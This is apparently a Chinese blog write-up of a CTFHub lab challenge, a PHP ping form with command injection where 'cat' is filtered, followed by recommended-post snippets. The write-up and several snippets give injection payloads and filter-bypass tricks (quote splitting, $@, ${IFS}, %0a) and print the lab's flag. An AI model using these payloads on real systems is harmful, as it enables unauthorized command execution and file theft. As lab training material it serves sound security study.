CTFhub-RCE-过滤cat

已于 2023-11-16 09:34:16 修改
阅读量379 收藏
点赞数 5
分类专栏: CTFhub-RCE 文章标签: 网络安全 php 安全
于 2023-11-16 09:33:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/ssss39/article/details/134434040
版权
文章探讨了如何通过单引号、双引号和特殊变量绕过限制,执行127.0.0.1上的shell命令,以及后续的Base64解密过程,涉及PHP环境下的安全漏洞利用。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

查看当前目录:输入:127.0.0.1|ls

 127.0.0.1|cat  flag_42211411527984.php  无输出内容

使用单引号绕过  127.0.0.1|c''at flag_42211411527984.php|base 64

使用双引号绕过  127.0.0.1|c""at flag_42211411527984.php|base64

使用特殊变量绕过  127.0.0.1|c$@at flag_42211411527984.php|base64

(base64 之间不要有空格)

 base64 解密

 <?php // ctfhub{28017fc356ce693428430cbd}

CTFHub-Web-RCE-命令注入
qq_54037445的博客
11-29 2636
1、常见的拼接符1、A;B 先执行A,再执行B2、A & B 简单的拼接3、A | B 显示B的执行结果4、A&&B A执行成功之后才会执行B5、A || B A执行失败之后才会执行B, 在特殊情况下可代替空格2、常见的命令1.type 显示文本文件内容type x:\1.txt //显示x盘下的1.txt文件内容。
CTFHUB-web-RCE
ookami6497的博客
12-03 1676
CTFHUB web-rce-过滤
2301_79783285的博客
12-18 833
回车键,即键盘上的ENTER键,是一个比较有用的键,在文字编辑时,回车键的作用是换行,在输入网址时回车键的作用是“转到”,在执行DOS命令时,回车键的作用是执行。
CTFHub技能树web(持续更新)--RCE--命令注入--过滤目录分隔符
jiuyongpinyin的博客
01-26 1199
过滤目录分隔符 首先我们依然是ls查看当前目录: 发现这里没有后缀了,再根据题目的提示,这就是个文件,我们需要进去,但是目录分隔符被过滤了,那么 ls …/ 这种命令就不能用了,那么我们先使用反斜杠查看这个文件夹里面的东东: 127.0.0.1 & ls \flag_is_here 看到了这个文件,然后我们应该如何查看呢,我们可以使用分号将命令同时执行,那么我们就是进入文件夹,读取文件: 127.0.0.1 & cd flag_is_here;cat flag_18147299093
RCE漏洞之绕过
h0ld1rs的博客
10-27 6248
文章目录花括号斜杠空格过滤一些命令分隔符黑名单绕过拼接绕过编码绕过单引号和双引号绕过利用Shell 特殊变量绕过linux中直接查看文件内容的工具文件构造 花括号 {} 在Linux bash中还可以使用{OS_COMMAND,ARGUMENT}来执行系统命令 {cat,flag} 斜杠 路径 / \是在正则等语法里面,表示后面跟的字符是正常字符,不需要转义。 也就意味着,我们可以在rce漏洞,过滤cat ls等命令时候,直接使用ca\t来实现绕过 空格过滤 < 、<>、%20(spac
ctfhubrce 通关笔记
2301_80489197的博客
04-18 374
这里进行了对cat过滤,通过preg_match_all()函数在变量ip和m中搜索“cat”字符串,如果里面没有“cat”字符串,则会进行ping命令。这一关将||和&给过滤了,但是还可以用其他没有被过滤的运算符进行拼接。通过反斜杠‘\’或者单引号进行绕过,也可以用tac命令来反向输出。先用ls查看一下当前目录下有那些文件,看到flag,去看一下。可以看到这一关是没有任何过滤的,所以可以直接用‘|’进行拼接。ping完后页面上什么也没有,但是在源码中可以看到flag。看到flag,再去看一下。
CTFHub技能书解题笔记-RCE-过滤空格、过滤目录分隔符、过滤运算符
qq_43006864的博客
04-01 4882
一、过滤空格 过滤了空格。 引入绕过空格过滤的字符:< 、<>、%20(space)、%09(tab)、$IFS$9、 ${IFS}、$IFS等 直接开始解题 这里就用<来绕过。flag还是再界面源码。 二、过滤目录分隔符 题目提示,这次过滤了目录分割符 / ,你能读到 flag 目录下的 flag 文件吗。 这里的话就更简单了,我们可以使用;和cd到目录然后使用cat抓取。也就是用;进行命令拼接。例如:x.x.x.x;cd ../;ls;cat xxx
CTFHUB-web-RCE-综合过滤练习
weixin_68416970的博客
08-07 232
ls flag_is_here 查看 flag 文件中的内容,发现回显为空,发现网页源代码中还过滤了几个字符,分别是 cat 、 flag 、 ctfhub ,这里尝试使用 %09 ( URL 编码中 表示 Tab 制表符)加上通配符进行绕过。查看网页源代码发现这次网页对 | 、 && 、 || 、 \ 、 / 、;发现换行符 %0a 和回车符 %0d 可以进行测试,在 URL 后面拼接访问。
CTFHUB-RCE通关记录以及常见的绕过过滤的方法
不想当脚本小子的脚本小子
03-21 2341
先过关,再分析相关的防御源代码 1.过滤cat 然后cat 301472130920273.php然后查看网页源代码即可得到flag 2.过滤cat 根据题目要求过滤cat 而该服务器为Linux系统区分大小写 就无法通过大小写来绕过 本来想使用vi命令替换cat命令也能查看到flag中的内容 但是失败了 最后用了替换法:127.0.0.0 ; $a=ca;$b=t; $a$b flagxxxx 题目源码: <?php $res = FALSE; if (is.
CTFHub技能树 Web-RCE 详解
weixin_45808483的博客
11-13 2512
RCE简介: 初学RCE(远程命令/代码执行漏洞)https://blog.youkuaiyun.com/qq_43814486/article/details/90020139 eval执行 启动环境 分析代码,提示我们将命令赋值给cmd执行 我们先查看当前位置的文件,没有什么用 /?cmd=system("ls"); 我们查看根目录文件,发现一个 flag_8999 文件 /?cmd=system("ls /"); 我们先尝试使用cat 命令查看 flag_8999文件 /..
CTFHUB-WEB-RCE
K_ShenH的博客
06-16 945
CTFHUB-WEB-RCE
CTFHub技能书解题笔记-RCE-综合过滤练习
qq_43006864的博客
04-06 3249
直接开题,综合过滤。提示我们:同时过滤了前面几个小节的内容, 如何打出漂亮的组合拳呢? 估计也是直接给了源码。直接打开链接,看到他过滤了,空格、/、\&、cat flag一堆。 这里我们慢慢绕过吧。一层层过。 首先,还是查看文件,LS他没过滤,但是过滤了;号,这里得找个替代,通过查url编码表发现%0a可以实现换行。 进行利用,发现;可以通过%0a代替 ls执行成功,看到了flag的位置,这里cat过滤,可以使用nl之类的代替,通过查大佬们的wp和资...
CTF刷题记录CTFHub-RCE-命令注入
m_de_g的博客
07-24 5369
** CTFHub-RCE-命令注入 ** 一、解题思路 通过输入一些指令,利用某些特定的函数进行的操作,从而达到命令执行攻击的效果。 1.无任何的过滤 因为没有任何的过滤,那么我们可以直接使用分号(;)闭合前面的语句,执行ls命令 http://challenge-49bb6bc15fd9e3ef.sandbox.ctfhub.com:10800/?ip=127.0.0.1;ls 通过执行ls命令可以看到,该目下的文件,这是linux环境下 如果是window环境下,使用命令dir查看目录文件 我
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8668
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
php8 match表达式使用教程
tangPHP的博客
04-02 486
PHP 8引入了match()表达式,用来替代传统的switch语句,提供更简洁、更安全的方式进行条件匹配。与switch不同,match()是一个表达式,它会返回值,并且使用 严格比较(===
文件包含绕过的小点总结(2)
m0_65853019的博客
04-01 560
例如访问:http://localhost/upload.php?访问:http://localhost/upload.php?例如访问http://localhost/upload.php?
PHP 8.x:现代Web开发的性能与效率革命
z18072129907的博客
04-02 480
PHP 8引入的JIT(即时编译)技术,通过动态将热点代码编译为机器码,使执行速度提升数倍。与传统逐行解释不同,JIT针对高频代码片段(如复杂算法)进行优化,配合Opcache缓存机制,显著降低了计算密集型任务的延迟。实测表明,在数学运算场景中,PHP 8.x较之前版本可提速50%以上,让PHP首次具备与编译型语言掰腕的实力。实测显示,在Laravel框架中,相同请求处理时间从PHP 7.4的80ms降至PHP 8.2的45ms,QPS提升40%,服务器资源消耗减少25%。自动短路,避免冗长的。
win32汇编环境,网络编程入门之十八
最新发布
iltokyo的博客
04-03 757
如何判断访问的网页是什么编码,以下示例只判断是 UFT-8 还是 GB2312编码,其它的编码方式可以此类推
实战打靶集锦-36-Deception
阿尔泰野狼的博客
04-02 947
本文记录了博主的一次打靶经历,涉及hydra爆破、python二进制文件提权等。
CTFHUB----web前置技能-rce
01-01
### CTFHUB Web 前置技能 RCE 挑战及解题思路 #### 远程命令执行简介 远程命令执行(Remote Command Execution, RCE),是指攻击者能够通过应用程序接口发送特定指令,在服务器端执行任意操作系统级别的命令。这种漏洞一旦被利用,可能导致整个系统的完全控制。 #### 发现潜在的RCE漏洞 当面对可能存在RCE漏洞的应用程序时,通常会寻找可以输入数据的地方,比如表单提交、URL参数等位置。如果这些地方的数据未经严格验证就直接用于构建并执行系统调用,则可能成为RCE攻击的目标[^1]。 #### 验证是否存在RCE漏洞 为了确认是否真的存在这样的安全风险,可以通过尝试注入一些简单的测试语句来观察响应情况。例如,在支持PHP环境的情况下,可以试着向目标页面传递如下payload: ```php <?php phpinfo(); ?> ``` 如果上述代码被执行并且返回了PHP配置信息,则说明确实存在未受保护的入口点允许外部传入的内容影响到内部逻辑处理流程。 #### 利用已知条件构造有效载荷 假设经过初步探测之后发现了某个变量可以直接参与到shell_exec()函数之中去,那么就可以精心设计一段能实现预期目的同时又不会引起怀疑的日志记录脚本作为最终的有效负载。这里给出一个简单例子用来获取当前目录下的文件列表: ```bash ls -al ``` 当然实际操作过程中还需要考虑更多因素,如编码方式转换、特殊字符转义等问题以确保成功绕过防护机制达到想要的效果。 #### 安全建议 对于开发者而言,预防此类问题的发生至关重要。应当遵循最小权限原则分配资源访问权;对所有来自客户端的信息都应做充分校验过滤后再参与后续运算过程;定期审查源码查找安全隐患及时修复补丁版本更新至最新状态等等措施均有助于减少遭受恶意侵害的可能性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

斜躺青年

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值